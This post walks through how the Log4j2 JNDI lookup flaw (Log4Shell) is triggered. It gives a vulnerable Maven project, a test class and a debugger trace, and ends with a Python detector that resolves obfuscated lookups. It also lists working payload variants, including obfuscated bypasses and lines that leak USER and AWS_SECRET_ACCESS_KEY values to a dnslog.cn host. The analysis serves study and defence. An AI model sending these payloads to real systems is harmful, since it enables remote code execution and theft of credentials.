Log4j2 vulnerability notes

Posted by 黑客倉庫站長

Maven environment

Code (xml):

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>top.lnng.log4j2</groupId>
  <artifactId>log4j2</artifactId>
  <version>1.0-SNAPSHOT</version>
  <packaging>jar</packaging>

  <name>log4j2</name>
  <url>http://maven.apache.org</url>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <configuration>
          <source>8</source>
          <target>8</target>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>

log4j2.xml

Code (xml):

<?xml version="1.0" encoding="UTF-8"?>

<configuration status="info">
  <Properties>
    <Property name="pattern1">[%-5p] %d %c - %m%n</Property>
    <Property name="pattern2">
      =========================================%n 日志级别:%p%n 日志时间:%d%n 所属类名:%c%n 所属线程:%t%n 日志信息:%m%n
    </Property>
    <Property name="filePath">logs/myLog.log</Property>
  </Properties>
  <appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="${pattern1}"/>
    </Console>
    <RollingFile name="RollingFile" fileName="${filePath}"
                 filePattern="logs/$${date:yyyy-MM}/app-%d{MM-dd-yyyy}-%i.log.gz">
      <PatternLayout pattern="${pattern2}"/>
      <SizeBasedTriggeringPolicy size="5 MB"/>
    </RollingFile>
  </appenders>
  <loggers>
    <root level="info">
      <appender-ref ref="Console"/>
      <appender-ref ref="RollingFile"/>
    </root>
  </loggers>
</configuration>
Test class

Code (java):

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class App {
    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(App.class);
        // Attacker-controlled value: log4j-core 2.14.1 still runs lookups on message parameters
        String username = "${jndi:ldap://127.0.0.1:8085/GFxElmpt}";
        logger.info("User {} login in!", username);
    }
}
Overall environment layout

[Screenshot: log4j2漏洞整理-1.png]


Keep setting breakpoints to locate where the lookup is triggered.
Execution happens when i is 7.

[Screenshot: log4j2漏洞整理-2.png]
Step in and inspect.

[Screenshot: log4j2漏洞整理-3.png]
It checks whether Log4j2's lookups feature is enabled (it is in our setup) and continues: it checks whether workingBuilder contains `${`; if it does, that part is extracted and the replace() method is called.

[Screenshot: log4j2漏洞整理-4.png]

[Screenshot: log4j2漏洞整理-5.png]
Step into the replace() method and take a look.

[Screenshot: log4j2漏洞整理-6.png]

[Screenshot: log4j2漏洞整理-7.png]

[Screenshot: log4j2漏洞整理-8.png]
Keep stepping until you reach the business logic: everything before substitute is just assignments, so we only need to watch how our payload changes.
A while loop walks the buffer and pulls out the content between `${` and `}`.

[Screenshot: log4j2漏洞整理-9.png]
Then substitute is entered again; this time the buf passed in no longer contains `${}`.

[Screenshot: log4j2漏洞整理-10.png]
Step into the resolveVariable function.
resolveVariable calls lookup; keep following it and it ends up calling jndiManager.lookup.
JndiManager.lookup delegates to this.context; the JndiManager itself is created by JndiManagerFactory.
Look at JndiManagerFactory.
It creates an InitialContext instance and returns a JndiManager object.

JndiManager is the final trigger point; from there on it is an ordinary JNDI injection problem.

  1. First check whether the content contains `${}`, then extract what is inside `${}`; this yields our malicious payload, jndi:xxx.
  2. Then split the payload on `:` and use the prefix to decide which resolver performs the lookup.
  3. Supported prefixes include date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j.

Payload variants

${jndi:ldap://127.0.0.1:8085/GFxElmpt}
${jnd${upper:ı}:ldap://[127.0.0.1]]/mESHFnWc}  (the jndi target needs port 389 open)

${jnd${upper:\u0131}:ldap://[127.0.0.1]]/KWhsLxIC}

${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:ı}:ldap://127.0.0.1:8086/mhStyxHU}
${jndi:ldap://${env:USER}.dnslog.cn}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}
${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}
${bundle:application:spring.datasource.password}
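The resolution order traced above (nested lookups first, then the `:-` default value, then the prefix compared in lower case) is what makes the obfuscated variants resolve to a jndi lookup, so a log-side detector has to apply the same order before it inspects the prefix. The Python below is an added example, not code from this post or from Log4j: it models only the upper, lower and default-value behaviour of StrSubstitutor, leaves every other prefix unresolved, and reports the target a jndi lookup would receive.

```python
# Added example, not log4j's own code: model StrSubstitutor's ${...} resolution for detection.

def _find_close(s, start):
    """Index of the '}' closing the '${' at `start`, honouring nesting; -1 if none."""
    depth, i = 0, start
    while i < len(s):
        if s.startswith('${', i):
            depth, i = depth + 1, i + 2
            continue
        if s[i] == '}':
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1

def _lookup(var, found):
    """Mimic Interpolator.lookup: split on the first ':' and lower-case the prefix."""
    prefix, _, name = var.partition(':')
    prefix = prefix.lower()           # Interpolator lower-cases the prefix (Locale.US)
    if prefix == 'jndi':              # the point where log4j would contact the server
        found.append(name)
        return '${jndi:' + name + '}'
    if prefix in ('upper', 'lower'):  # UpperLookup/LowerLookup just change case
        return getattr(name, prefix)()
    return None                       # unknown prefix: unresolved

def resolve(s, found=None):
    """Return `s` with lookups substituted; JNDI targets are collected into `found`."""
    found = [] if found is None else found
    out, i = [], 0
    while i < len(s):
        end = _find_close(s, i) if s.startswith('${', i) else -1
        if end == -1:                                      # plain text or unterminated '${'
            out.append(s[i]); i += 1
            continue
        inner = resolve(s[i + 2:end], found)               # nested lookups resolve first
        var, has_default, default = inner.partition(':-')  # first ':-' starts the default
        value = _lookup(var, found)
        if value is None:
            value = default if has_default else '${' + inner + '}'
        out.append(value); i = end + 1
    return ''.join(out)

def scan_line(line):
    """JNDI targets a single log line would trigger after normalisation ([] if none)."""
    found = []
    resolve(line, found)
    return found
```

Calling scan_line on a raw log line returns the targets a jndi lookup would receive after the nested upper, lower and default-value lookups have been resolved; a benign `${ctx:loginId:-unknown}` yields an empty list.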
 